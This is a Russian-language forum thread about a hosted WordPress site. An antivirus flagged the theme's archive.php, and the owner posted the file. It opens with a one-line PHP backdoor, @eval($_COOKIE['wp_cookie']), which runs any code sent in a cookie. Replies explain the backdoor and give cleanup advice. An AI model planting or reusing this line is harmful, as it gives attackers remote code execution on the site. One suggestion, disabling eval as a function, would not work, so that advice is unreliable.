Антивирус нашел странный файлик в шаблоне.


Maxim-KL
1794

Здравствуйте, уважаемы. Делал бекапы, да и проверял что творится на хостингах и тут заметил что антивирус ругается на одном сайте на WP на такой файлик который находится в шаблоне archive.php

Вот содержимое файлика:


<?php @eval($_COOKIE['wp_cookie']);

$latteParams['bodyClasses'] .= ' with-sidebar';
$latteParams['bodyId'] = 'normal-page';

$latteParams['customTypeName'] = EDITABLE_CT_NAME;

$latteParams['archive'] = new WpLatteArchiveEntity();

$latteParams['posts'] = WpLatte::createPostEntity($GLOBALS['wp_query']->posts);

WPLatte::createTemplate(basename(__FILE__, '.php'), $latteParams)->render();

Что посоветуете сделать? Удалить и забыть? Или может это только вершина айсберга и надо ковырять глубже… Или удаление потянет за собой некорректную работу шаблона?:popcorn:


edogs software

Maxim-KL,

Ругается он скорее всего на @eval($_COOKIE[‘wp_cookie’]);

Удалить именно это безусловно надо и к проблемам с 99% вероятностью это не приведет.

Но если не найдете причину появления этого, то завтра оно снова появится.

Поэтому а) удаляйте б) ищите как оно туда попало

Перед первым пунктом, если это дозволительно, добавьте в запрещенные функции eval и остальные из этой подгруппы (исполнение произвольного кода).


ivan-lev

Maxim-KL:
Делал бекапы, да и проверял что творится на хостингах

А в предыдущих версиях бэкапов такое же?. .

Maxim-KL:
файлик который находится в шаблоне archive.php

Достаточно наглядный пример.. и про бесплатные шаблоны из неизвестных источников, и про дырявость wp.. Счас ещё SeVlad придёт, подкинет.. ))


Maxim-KL

edogs:
а) удаляйте б) ищите как оно туда попало

Удалил, весь файл кажется все пока работает корректно.

Попало наверно еще давно с шалоном, но интересно это все или там еще стоит ожидать кучу неприятностей по файлом…

———- Добавлено 29.04.2020 в 19:44 ———-

ivan-lev:
А в предыдущих версиях бэкапов такое же?. .

Да, как бы и нет старых бекапов, и шаблон конечно еще тот… уже и не помню откуда он на том сайте…


Sitealert

Maxim-KL:
Что посоветуете сделать? Удалить и забыть? Или может это только вершина айсберга и надо ковырять глубже… Или удаление потянет за собой некорректную работу шаблона?🍿

Это дырища величиной в сайт. Во-первых, надо посмотреть исходники темы на предмет этого кода. Если там то же самое – значит, это закладка создателя темы, и таких закладок может быть много. Тему фтопку. Если в исходниках этого нет, то сайт взломан. Надо искать подобные шеллы по всему сайту, а также искать исходную дыру, через которую произошёл взлом.

Ни в коем случае не восстанавливать сайт из бэкапов без предварительного анализа сайта специалистом. По возможности закрыть сайт на «Технические работы».


Maxim-KL

Sitealert, Как раз пишу вам ТЗ по данному сайту)) Надо будет это добавить в него, справитесь? Когда можно высылать?))


Sitealert

Я-то справлюсь, только не надо было этот файл трогать. Надо было просто сайт закрыть.


Maxim-KL

Sitealert:
Надо было просто сайт закрыть.

Так могу файл вернуть обратно. А сайт можно и не закрывать, там как бы нет особой ценности…


Sitealert

edogs:
добавьте в запрещенные функции eval

Я б щас матюкнулся, но не знаю, кто из едогсов передо мной – вдруг дама… 🙄

Это не функция.


ivan-lev

Sitealert:
Это не функция.

А хто тогда? o_O

https://www.php.net/manual/en/function.eval.php


Stek

@eval($_COOKIE***91;’wp_cookie’***93;);

Прекрасный ход. Записываем в куки любую команду, заходим на страницу и пхп ее выполняет 🙂 Типичный бэкдор.

Sitealert:
Я б щас матюкнулся, но не знаю, кто из едогсов передо мной – вдруг дама…
Это не функция.

eval — это функция.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *